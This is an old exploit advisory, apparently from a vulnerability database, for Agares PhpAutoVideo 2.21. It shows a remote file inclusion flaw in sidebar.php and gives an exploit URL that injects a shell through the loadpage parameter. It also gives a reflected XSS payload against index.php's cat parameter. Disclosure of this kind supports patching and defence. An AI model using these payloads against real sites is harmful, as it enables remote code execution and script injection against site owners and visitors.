Agares PhpAutoVideo 2.21(XSS/RFI) Multiple Remote Vulnerabilities

2008.01.23
Risk: High
Local: No
Remote: Yes
CWE: CWE-98

------------------------------------------------------------------------ ----------- - Author : H-T Team { HouSSaMix & ToXiC350 } From MoRoCCo - ------------------------------------------------------------------------ ----------- # Script : Agares PhpAutoVideo 2.21 and below # Download : http://scriptmafia.org/2007/12/19/agares_phpautovideo_v2.21.html # BUG : (XSS/RFI) Multiple Remote Vulnerabilities ## Remote File Inclusion [+] Vulnerable CODE : ~~~~~~~~~ /theme/phpAutoVideo/LightTwoOh/sidebar.php ~~~~~~~~~~~~~~~~~ <?PHP include($loadpage); ?> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Exploit : [Target.il]/[Path]/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=[S H3LL] => other RFI was found in this script for version 2.21 ( http://www.milw0rm.com/exploits/4782 ) ## XSS exploit : %22%3E%3Cscript%3Ealert(1);%3C/script%3E [Target.il]/[Path]/index.php?cat=%22%3E%3Cscript%3Ealert(1);%3C/script%3 E [Target.il]/[Path]/index.php?cat=<br> XSS found by HouSSaMix and ToXiC350 => works for all versions ------------------------------------------------------------------------ ----------- - Gr33tz : coNan , GoLd_M , RoMaNcYxHaCkEr , Rachidox , and all muslims Hackers - ------------------------------------------------------------------------ -----------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top